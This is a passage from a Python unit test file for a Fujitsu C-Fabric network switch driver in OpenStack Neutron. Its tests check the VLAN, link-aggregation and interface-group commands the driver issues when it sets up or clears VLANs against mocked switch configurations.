+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'add', ports=self.ports) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'add', ports=self.ports) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_already_configured_vlan_and_includes_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
ifgroup 2 ether 1/1/0/3
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'replace', ifg='1-2') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1-2,0')
self.assert_configured(expect)
def test_already_configured_vlan_and_includes_between_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/1
ifgroup 2 ether 1/1/0/3
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'replace', ifg='0,2') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='0,2,1')
self.assert_configured(expect)
def test_already_configured_vlan_and_not_included_in_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/3
ifgroup 2 ether 1/1/0/4
interface 1/1/0/1
exit
vfab 1 vlan 8 endpoint untag 0-2
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='3') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='0-2,3')
self.assert_configured(expect)
def test_exists_other_vlan_definition_missing_interface_def(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_other_vlan_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_other_vlan_definition_with_different_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 100 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 100 endpoint untag 100
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_for_target_port(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.close_session.assert_called_once_with()
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_for_other_port(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/2
type endponit
cfab port-mode external
lldp mode enable
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exists_interface_def_of_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
type linkaggregation 1
exit
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 ether 1/1/0/10"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_and_reuse(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 ether 1/1/0/1"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_ifgroup_with_port_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1-1/1/0/5
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_port_range_and_out_of_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2-1/1/0/5
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "ifgroup 0 linkaggregation 1 1"
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1-4
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exists_lag_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
exit
interface 1/1/0/2
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_definition_type_is_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_lag_and_vlan_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete') \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('ifgroup', 'add', ifg='1') \
+ cfab_cmd('interface', 'add') \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_ifgroup_ether_is_exhauted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=100)
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan, "a", "u", "p",
"1", 8, self.ports, self.mac)
class TestCFABdriverSetupVlanWithLAG(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration.
"""
def setUp(self):
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverSetupVlanWithLAG, self).setUp()
self.ports = "1/1/0/1,1/1/0/2"
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.setup_vlan_with_lag, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhauted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan_with_lag, "a", "u", "p",
"1", 8, self.ports, self.mac)
def test_lag_id_is_exhauted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(1, 200):
candidate += 'linkaggregation 1 {lag}\n'.format(lag=i)
mgr.get_candidate_config.return_value = candidate
self.assertRaises(ml2_exc.MechanismDriverError,
self.driver.setup_vlan_with_lag, "a", "u", "p",
"1", 8, self.ports, self.mac)
def test_no_preconfig_exist(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = "no_preconfig"
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add') \
+ cfab_cmd('ifgroup', 'add', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add')
self.assert_configured(expect)
def test_exist_lag_id_and_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
exit
interface 1/1/0/2
exit
interface 1/1/0/3
type linkaggregation 1
exit
interface 1/1/0/4
type linkaggregation 1
exit
interface 1/1/0/5
type linkaggregation 2
exit
interface 1/1/0/6
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0
vfab 1 vlan 16 endpoint untag 1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='2', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='0,2')
self.assert_configured(expect)
def test_illegal_exist_different_lag_id(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0-1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='2', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1,2')
self.assert_configured(expect)
def test_exists_ether_vlan_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1,1/1/0/2
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
cfab.setup_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='1') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_reuse_ifgroup(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
ifgroup 2 linkaggregation 1 3
interface 1/1/0/1
exit
interface 1/1/0/2
exit
interface 1/1/0/3
type linkaggregation 2
exit
interface 1/1/0/4
type linkaggregation 2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 16 endpoint untag 1
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('interface', 'add', lag_id='3', ports=self.ports,
lag=True) \
+ cfab_cmd('vlan', 'add', ifg='2')
self.assert_configured(expect)
def test_exist_lag_id_and_override(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='2') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='2', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='2',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_exist_ifgroup_with_lag_range_and_out_of_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1-2
interface 1/1/0/1
exit
interface 1/1/0/2
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'add', lag_id='3') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='3', lag=True) \
+ cfab_cmd('interface', 'add', lag_id='3',
ports=self.ports, lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
def test_already_configured_lag_and_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
interface 1/1/0/2
type linkaggregation 1
exit
linkaggregation 1 1 type endpoint
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.setup_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete') \
+ cfab_cmd('lag', 'add', lag_id='2') \
+ cfab_cmd('ifgroup', 'add', ifg='1', lag_id='2', lag=True) \
+ cfab_cmd('interface', 'add', ports=self.ports,
lag_id='2', lag=True) \
+ cfab_cmd('vlan', 'add', ifg='1')
self.assert_configured(expect)
class TestCFABdriverClearVlan(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration."""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverClearVlan, self).setUp()
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.clear_vlan, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhauted(self):
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
ret = self.driver.clear_vlan("a", "u", "p", "1", 8,
self.ports, self.mac)
self.assertIsNone(ret)
def test_clear_with_no_command(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete') + cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_clear_vlan_and_assoc(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
pprofile test-1 vlan tag 8
vfab 1 vlan 8 endpoint untag 0
vfab 1 pprofile 0 vsiid mac 00:01:02:03:04:05 test-1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('pp_assoc', 'delete') \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0,1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition_from_boundary(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/2
ifgroup 1 ether 1/1/0/3
ifgroup 2 ether 1/1/0/4
ifgroup 3 ether 1/1/0/1
ifgroup 4 ether 1/1/0/5
ifgroup 5 ether 1/1/0/6
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
interface 1/1/0/2
type endponit
cfab port-mode external
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0-5
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', ifg='0-2,4-5') \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_vlan_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
type endponit
cfab port-mode external
lldp mode enable
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_already_cleared_all_definitions(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
exit
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlans(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0
vfab 1 vlan 200 endpoint untag 0
vfab 1 vlan 300 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'delete', vlanid=100) \
+ cfab_cmd('vlan', 'delete', vlanid=200) \
+ cfab_cmd('vlan', 'delete', vlanid=300) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_different_vlan_with_range(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
vfab 1 vlan 100 endpoint untag 0-1
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('vlan', 'replace', vlanid=100, ifg=1) \
+ cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag_without_vlan(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_exists_lag_without_interface(self):
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
exit
linkaggregation 1 1 mode active
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
def test_illegal_exists_port_range(self):
